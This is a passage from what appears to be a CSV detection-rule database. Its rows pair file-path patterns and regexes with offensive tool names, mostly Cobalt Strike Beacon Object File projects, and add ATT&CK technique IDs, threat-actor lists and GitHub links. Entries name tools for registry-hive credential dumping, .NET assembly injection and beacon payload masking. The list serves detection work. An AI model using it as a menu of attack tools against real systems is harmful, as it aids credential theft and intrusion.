Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rookuu/BOFs","1","0","N/A","N/A","10","10","175","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z","5731" "*/BOF.NET/*",".{0,1000}\/BOF\.NET\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","5732" "*/bof.nim",".{0,1000}\/bof\.nim","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 
- T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","N/A","10","10","84","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z","5733" "*/bof.x64.o*",".{0,1000}\/bof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 
- TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5734" "*/bof.x64.o*",".{0,1000}\/bof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - 
Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5735" "*/bof.x86.o*",".{0,1000}\/bof\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - 
Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5736" "*/bof.x86.o*",".{0,1000}\/bof\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5737" "*/bof/bof.c",".{0,1000}\/bof\/bof\.c","offensive_tool_keyword","cobaltstrike","Information 
released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5738" "*/bof/bof.vcxproj*",".{0,1000}\/bof\/bof\.vcxproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5739" "*/bof/IABOF*",".{0,1000}\/bof\/IABOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","5740" "*/bof/IAStart.asm*",".{0,1000}\/bof\/IAStart\.asm.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte 
- BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","5741" "*/bof_reg_collect_parser.py*",".{0,1000}\/bof_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","5742" "*/BOF-Builder*",".{0,1000}\/BOF\-Builder.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - 
MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","N/A","10","10","28","4","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z","5743" "*/bof-collection/*",".{0,1000}\/bof\-collection\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 
Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","5744" "*/bofhound.git*",".{0,1000}\/bofhound\.git.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5745" "*/bofhound.py*",".{0,1000}\/bofhound\.py.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","1","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","5746" "*/BOFMask.git*",".{0,1000}\/BOFMask\.git.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","N/A","10","2","120","27","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z","5747" "*/bofmask.h*",".{0,1000}\/bofmask\.h.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - 
TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","N/A","10","2","120","27","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z","5748" "*/BOFNETExamples/*",".{0,1000}\/BOFNETExamples\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","5749" "*/BOF-RegSave*",".{0,1000}\/BOF\-RegSave.{0,1000}","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM 
registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","N/A","10","10","198","32","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z","5750" 